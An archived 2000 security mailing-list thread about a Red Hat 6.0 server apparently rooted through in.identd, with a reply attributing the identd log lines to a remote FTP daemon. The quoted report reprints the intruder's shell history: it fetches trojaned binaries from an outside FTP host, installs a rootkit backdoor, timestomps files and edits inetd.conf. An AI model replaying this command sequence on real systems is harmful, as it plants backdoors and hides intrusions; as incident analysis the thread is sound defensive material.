Security Incidents mailing list archives
Re: Rooted through in.identd on Red Hat 6.0
From: jburdge () AVENTAIL COM (Jon Burdge)
Date: Thu, 20 Apr 2000 09:34:39 -0700
Those requests appear to be the site he ftp'd to (ftp 200.192.58.201 21) requesting the ident of who he was connecting as. It looks more like it was just the ftp daemon on the remote site behaving appropriately.
-----Original Message----- From: Del Elson [mailto:del () BABEL COM AU] Sent: Tuesday, April 18, 2000 10:02 PM To: INCIDENTS () SECURITYFOCUS COM Subject: Rooted through in.identd on Red Hat 6.0 Hi, A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently. The hacker left the usual trace in /.bash_history, which ran like: mkdir /usr/lib/... ; cd /usr/lib/... ftp 200.192.58.201 21 cd /usr/lib/... mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz gzip -d * chmod +x * mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07 echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221; touch -t 199910122110 /dev/cui220 touch -t 199910122110 /dev/cui221 touch -t 199910122110 /usr/lib/pt07 touch -t 199910122110 /usr/sbin/syslogd touch -t 199910122110 /usr/sbin/tcpd touch -t 199910122110 /bin/ps touch -t 199910122110 /bin/netstat touch -t 199910122110 /usr/bin/pstree cat /etc/inetd.conf | grep -v 15678 >> /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd ... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were: Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201 Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 ... the IP address traces back to somewhere in Brazil. Anyone know of any current bug notices, exploits, or patches for in.identd? Del
Current thread:
- Re: Rooted through in.identd on Red Hat 6.0 jms (Apr 20)
- <Possible follow-ups>
- Re: Rooted through in.identd on Red Hat 6.0 Jon Burdge (Apr 20)